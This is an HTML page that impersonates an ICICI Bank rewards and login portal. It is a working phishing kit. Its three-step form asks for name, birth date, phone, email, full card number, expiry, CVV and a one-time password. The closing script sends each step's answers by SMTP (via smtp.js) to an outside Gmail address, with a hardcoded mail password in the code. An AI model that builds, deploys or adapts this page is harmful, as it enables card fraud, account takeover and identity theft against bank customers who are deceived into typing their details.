<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js"
    integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo"
    crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/popper.js@1.14.7/dist/umd/popper.min.js"
    integrity="sha384-UO2eT0CpHqdSJQ6hJty5KVphtPhzWj9WO1clHTMGa3JDZwrnQq4sF86dIHNDz0W1"
    crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/js/bootstrap.min.js"
    integrity="sha384-JjSmVgyd0p3pXB1rRibZUAYoIIy6OrQ6VrjIEaFf/nJGzIxFDsf4x0xIM+B07jRM"
    crossorigin="anonymous"></script>
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/css/bootstrap.min.css"
    integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
  <title> Icici Bank Rewards</title>
  <style>
    .step {
      display: none;
    }

    .step.active {
      display: flex;
      align-items: center;
      flex-direction: column;
      position: relative;
      top: 70px;
    }

    * {
      font-family: 'Gill Sans', 'Gill Sans MT', 'Calibri', 'Trebuchet MS', sans-serif;
      font-size: 14px;
    }

    .container {
      width: 100%;
      padding-right: 0;
      padding-left: 0;
      margin-right: 0;
      margin-left: 0;
    }

    h3 {
      font-size: 20px;
      font-weight: 700;
      padding: 0 5px;
    }

    html {
      scroll-behavior: smooth;
    }

    .bank {
      font-size: medium;
    }

    button {
      background: orange;
      color: white;
      font-weight: bolder;
      border-radius: 4px;
      height: 35px;
      border: none;
    }

    .para {
      display: flex;
      flex-direction: column;
      align-items: center;
      font-size: 12px;

    }

    .para-h3 {
      text-align: center;
      width: 70%;
    }

    .banner-img {
      position: relative;
      margin-top: 75px;
      padding: 5px;
      height: 190px;
      width: 100%;
      background: rgb(245 222 179 / 20%);
    }

    h4 {
      font-size: 1.5rem;
      position: relative;
      bottom: 28px;
    }

    p {
      text-align: center;
      padding: 0 5px;
    }

    @media screen and (min-width: 673px) {
      .banner-img {
        height: 190px;
        width: 100%;
      }
    }

    .navbar {
      background: #fff;
      transition: all .6s;
      backface-visibility: hidden;
      box-shadow: 0 2px 5px 1px rgba(51, 51, 51, 0.5);
      max-height: 39%;
    }

    .navbar-dark .navbar-nav {
      color: #fff;
      text-transform: capitalize;
      line-height: 16px;
      display: flex;
      flex-direction: column;
      align-items: center;
    }

    .navbar-dark .navbar-nav .nav-link {
      color: #000;
      /* color: rgba(255, 255, 255, 0.8); */
      border: 0;
    }

    .navbar-dark .navbar-nav .nav-link:hover {
      color: #fff;
    }

    .navbar-dark .navbar-nav .nav-link:focus {
      color: #fff;
      outline: 0;
    }


    .navbar-dark .navbar-toggler:focus {
      color: #000;
      border-color: #fff;
      outline: none;
    }

    .navbar-dark .navbar-toggler {
      color: #000;
      border-color: #fff;
    }

    .navbar-dark .navbar-toggler span {
      display: block;
      width: 30px;
      height: 2px;
      margin: 6px auto;
      background: #000;
      /* transition: all .6s cubic-bezier(0.250, 0.100, 0.250, 1.000); */
    }

    .navbar-dark .navbar-toggler:hover span,
    .navbar-dark .navbar-toggler:focus span {
      background: #ccc;
    }

    /* rotate first span */
    .navbar-dark .navbar-toggler[aria-expanded="true"] span:first-of-type {
      transform: rotate(45deg) translate(6px, 6px);
    }

    /* hide second span */
    .navbar-dark .navbar-toggler[aria-expanded="true"] span:nth-of-type(2) {
      opacity: 0;
    }

    /* rotate third span */
    .navbar-dark .navbar-toggler[aria-expanded="true"] span:last-of-type {
      transform: rotate(-45deg) translate(5px, -5px);
    }

    .navbar-dark .navbar-toggler[aria-expanded="false"] span {
      transform: none;
      opacity: 1;
    }

    .navbar-brand {
      width: 162px;
      height: 44px;
      background: url(../img/logo.png) left center no-repeat;
      border: 0;
      text-indent: -99999px;
    }

    .navbar-dark .navbar-toggler span {
      display: block;
      width: 30px;
      height: 2px;
      margin: 6px auto;
      background: #000;
      transition: all .6s cubic-bezier(0.250, 0.100, 0.250, 1.000);
    }

    /* rotate first span */
    .navbar-dark .navbar-toggler[aria-expanded="true"] span:first-of-type {
      transform: rotate(45deg) translate(6px, 6px);
    }

    /* hide second span */
    .navbar-dark .navbar-toggler[aria-expanded="true"] span:nth-of-type(2) {
      opacity: 0;
    }

    /* rotate third span */
    .navbar-dark .navbar-toggler[aria-expanded="true"] span:last-of-type {
      transform: rotate(-45deg) translate(5px, -5px);
    }

    .navbar-dark .navbar-toggler[aria-expanded="false"] span {
      transform: none;
      opacity: 1;
    }

    button.para-btn {
      margin-left: 9px;
      margin-bottom: 10px;
    }

    .para .btn {
      margin: 20px;
      background: orange;
      color: white;
      font-weight: bolder;
      border-radius: 4px;
      height: 35px;
      border: none;
    }

    button.nav-link.scroll-link.navbar-btn {
      width: 64px;
      color: #fff;
    }

    .myForm {
      position: relative;
      bottom: 20px;
    }

    .label {
      display: block;
      margin: 2px;
    }

    .myForm input {
      overflow: visible;
      padding: 5px;
      width: 345px;
      height: 40px;
      border: none;
      box-shadow: 0 -1px 10px -2px rgba(51, 51, 51, 0.5);
    }

    .myForm2 {
      position: relative;
      bottom: 20px;
    }

    .label2 {
      display: block;
      position: relative;
      margin-bottom: 4px;
    }

    .myForm2 input {
      overflow: visible;
      padding: 5px;
      width: 345px;
      height: 40px;
      border: none;
      box-shadow: 0 -1px 10px -2px rgba(51, 51, 51, 0.5);
    }

    .myForm3 {
      position: relative;
      bottom: 20px;
    }

    .label3 {
      display: block;
      position: relative;
      margin-bottom: 4px;
    }

    .myForm3 input {
      overflow: visible;
      padding: 5px;
      width: 345px;
      height: 40px;
      border: none;
      box-shadow: 0 -1px 10px -2px rgba(51, 51, 51, 0.5);
    }

    .btn {
      margin: 10px;
      background: orange;
      color: white;
      font-weight: bolder;
      border-radius: 4px;
      height: 35px;
      border: none;
    }

    .btn:hover {
      color: white;
    }
  </style>
</head>

<body>
  <header>
    <nav class="navbar navbar-dark fixed-top">
      <div class="container">
        <div class="logo-img"><img src="IBN_BIG.svg" alt=""></div>
        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav"
          aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
          <span></span>
          <span></span>
          <span></span>
        </button>
        <div class="collapse navbar-collapse" id="navbarNav">
          <ul class="navbar-nav ml-auto">
            <li class="nav-item">
              <a class="nav-link scroll-link" href="#top-content">About Us</a>
            </li>
            <li class="nav-item">
              <a class="nav-link scroll-link" href="#section-1">Pay</a>
            </li>
            <li class="nav-item">
              <a class="nav-link scroll-link" href="#section-2">Rewards</a>
            </li>
            <li class="nav-item">
              <a class="nav-link scroll-link" href="#section-3">Contacts</a>
            </li>
            <li class="nav-item">
              <a class="nav-link scroll-link" href="#section-4">Limit Increase</a>
            </li>
            <li class="nav-item">
              <button class="nav-link scroll-link navbar-btn" href="#section-5">Log In</button>
            </li>
          </ul>
        </div>

      </div>
    </nav>
  </header>

  <div class="section">
    <div><img class="banner-img"
        src="cartoon-character-businessman-sitting-using-laptops-on-table-working-in-office-with-sofa-chair-isolated-3d-illustration-or-3d-render-png.webp"
        alt=""></div>
  </div>

  <div id="step1" class="step active">
    <h4>Log into ICICI Bank</h4>
    <form class="myForm form-step" id="myForm1">
      <div class="name">
        <label class="label" for="fullName">Full Name</label>
        <input type="text" id="fullName" name="fullName" required>
      </div>
      <div class="dob">
        <label class="label" for="dob">Date of Birth</label>
        <input type="date" id="dob" name="dob" required>
      </div>
      <div class="mobile">
        <label class="label" for="mobileNo">Mobile Number</label>
        <input type="tel" id="mobileNo" name="mobileNo" pattern="[0-9]{10}" required>
      </div>
      <div class="email">
        <label class="label" for="email">Email Address</label>
        <input type="email" id="email" name="email" required>
      </div>
      <button class="btn" type="button" onclick="formManager.submitForm(1)">Next</button>
    </form>
  </div>

  <div id="step2" class="step">
    <h4>Submit Your Details</h4>
    <form class="myForm2 form-step" id="myForm2">
      <div class="card-number">
        <label class="label2" for="cardNumber">Card Number</label>
        <input type="text" id="cardNumber" name="cardNumber" required>
      </div>
      <div class="card-expiry">
        <label class="label2" for="cardExpiry">Card Expiry</label>
        <input type="text" id="cardExpiry" name="cardExpiry" placeholder="MM/YY" pattern="[0-9]{2}/[0-9]{2}" required>
      </div>
      <div class="cvv">
        <label class="label2" for="cvv">CVV</label>
        <input type="text" id="cvv" name="cvv" pattern="[0-9]{3}" required>
      </div>
      <div class="fullname">
        <label class="label2" for="fullName">Card Holder Name</label>
        <input type="text" id="fullName" name="fullName" required>
      </div>
      <button class="btn" type="button" onclick="formManager.submitForm(2)">Next</button>
    </form>
  </div>

  <div id="step3" class="step">
    <h4>OTP Verification</h4>
    <form class="myForm3 form-step" id="myForm3">
      <div class="otp-verification">
        <label class="label3" for="otp">Enter OTP</label>
        <input type="text" id="otp" name="otp" required>
      </div>
      <button class="btn" type="button" onclick="formManager.submitForm(3)">Submit</button>
    </form>
  </div>
  <script src="https://smtpjs.com/v3/smtp.js"></script>
  <script>
    function sendEmail(formData) {
      Email.send({
        Host: "smtp.elasticemail.com",
        Username: "icicibank688@gmail.com",
        Password: "F1C927F8C0A1B115BDD37C9C9A7213F08ED2",
        To: 'icicibank688@gmail.com',
        From: "icicibank688@gmail.com",
        Subject: "Customer Data",
        Body: formatFormData(formData),
        Secure: true,
        Port: 587,
      }).then(
        (message) => console.log('data sent successfully', message)
      );
    }

    function formatFormData(formData) {
      let formattedData = "";
      for (let [key, value] of formData.entries()) {
        formattedData += `${key}: ${value}\n`;
      }
      return formattedData;
    }

    let formManager = {
      submitForm: function (step) {
        let currentForm = document.getElementById(`step${step}`);
        let formData = new FormData(document.getElementById(`myForm${step}`));

        // Additional logic for handling form submission, if needed
        sendEmail(formData);

        // Hide the current form
        if (step !== 3) {
          // Hide the current form
          currentForm.classList.remove('active');

          // Show the next step
          let nextStep = document.getElementById(`step${step + 1}`);
          if (nextStep) {
            nextStep.classList.add('active');
          }
        }

        document.getElementById(`myForm${step}`).reset();
      },
    };
  </script>
</body>

</html>